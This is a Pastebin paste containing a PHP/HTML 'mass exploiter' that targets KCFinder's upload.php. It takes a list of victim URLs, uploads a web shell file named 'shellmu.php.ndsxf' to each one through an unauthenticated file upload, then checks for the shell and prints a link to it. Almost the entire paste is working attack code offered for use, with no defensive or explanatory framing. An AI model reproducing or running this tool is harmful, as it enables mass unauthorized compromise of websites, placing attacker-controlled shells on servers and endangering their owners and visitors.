AgusSR

KCFINDER Auto Xploiter [ Mass Xploiter ]

Feb 28th, 2016
1,701
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <style type="text/css">
  3. html {
  4.     text-align: center;
  5. }
  6. a {
  7.     text-decoration: none;
  8.     color: black;
  9. }
  10. </style>
  11. <form method="post">
  12. Target: <br>
  13. <textarea name="target" placeholder="http://www.target.com/[path]/kcfinder/upload.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
  14. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
  15. </form>
  16. </html>
  17. <?php
  18. # IndoXploit
  19. function ngirim($url) {
  20. $ch = curl_init($url);
  21.       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22.       curl_setopt($ch, CURLOPT_POST, 1);
  23.       curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata" => "@shellmu.php.ndsxf"));
  24. $data = curl_exec ($ch);
  25. return $data;
  26. }
  27. $target = explode("\r\n", $_POST['target']);
  28. if($_POST['x']) {
  29.     foreach($target as $korban) {
  30.         $upload = ngirim($korban);
  31.         if($upload) {
  32.             $shell = str_replace("upload.php", "upload/", $korban);
  33.             $cek_shell = @file_get_contents("$shell/files/shellmu.php.ndsxf");
  34.             echo "[+] $korban [ <font color=green>sukses</font> ]<br>";
  35.             if(preg_match("/kata-kata yang ada di shellmu/", $cek_shell)) {
  36.                 echo "[+] <font color=green>Shellmu ada</font> => <a href='$shell/files/ix.php.ndsxf' target='_blank'>$shell/files/ix.php.ndsxf</a><br>";
  37.             } else {
  38.                 echo "[-] <font color=red>Shellmu gaada</font><br>";
  39.             }
  40.         } else {
  41.             echo "[-] $korban [ <font color=red>gagal</font> ]<br>";
  42.         }
  43.     }
  44. }
  45. ?>
RAW Paste Data